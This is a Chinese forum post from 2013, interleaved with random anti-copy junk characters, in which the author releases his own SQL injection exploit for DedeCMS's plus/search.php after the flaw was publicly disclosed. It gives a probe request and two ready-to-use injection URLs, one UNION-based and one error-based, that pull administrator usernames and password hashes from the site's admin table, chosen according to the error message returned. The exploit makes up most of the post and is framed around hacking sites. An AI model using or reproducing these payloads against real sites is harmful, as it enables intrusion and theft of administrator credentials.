转载不加作者名的没JJ
9 u) _" A! P5 x6 m4 v% c% [. v& Y: g$ b; }+ H8 e3 |- j, u
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
8 O" T: s4 a2 ?2 W7 W
4 n3 V! h& Y% a5 }: n既然已经发出来了,我就把我自己搞的exp发下吧。。唉。1 z- ~* h- d. T2 P* x
' k" E% G$ u" f2 }
我一般是这样测试的:
- {7 a( L; E1 p) r. Q* s$ }7 e& P, T: X& M3 f; X) i2 \& ~
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a: Q; L5 q* Z. @( _ ^6 W
/ K4 }3 e- c9 Z8 }6 ?9 J, J
转载不加作者名的没JJ
2 v# I j( j7 G! g
( f( w, g3 X0 C' S. \6 r8 O作者:鬼哥+ `% V. `( u" w% V8 r f6 A0 ~
9 ^1 }+ D8 D; {$ ~ N
+ s+ d/ y& W9 J: r( c
9 c8 l$ j8 @: w" x& y看结果如果提示# ?, A* d$ R; U! D
# | _; s$ n6 x+ R9 l7 {2 V4 p2 b2 k' _Safe Alert: Request Error step 2 !1 @/ `1 t: o0 `: `5 b+ k9 U; X
4 g" q7 z. |% ~& d/ t
那么直接用下面的exp# v% s2 ^$ p' R& `
) n/ P4 L7 D8 p7 b5 U" `, nxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
. |* Q( G. @( o: c
8 K1 }9 ^8 U! i& h, s$ L( \1 ]1 H/ D# L% P, r3 P
看结果如果提示
: ]1 r) X3 v! g4 A# I7 ]) }# J6 r$ _5 y; j' n
Safe Alert: Request Error step 1 !
8 U% b. j( y7 t, n" U5 _
5 E2 v" Y: V3 S7 L那么直接用下面的exp# l5 k4 X) O; C, v# X6 g
( u9 v- {! S& e: o5 j; jxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
$ P3 U! y8 Z6 d3 ~- Q: A/ `! h+ z3 f7 I$ s0 r, P
$ o5 a' Y9 `& r1 J# J
如果正常显示证明漏洞不存在了。
% c$ i9 A7 i) Y$ ^( c
5 R6 N/ Y4 j8 s C2 S. W1 E0 H转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对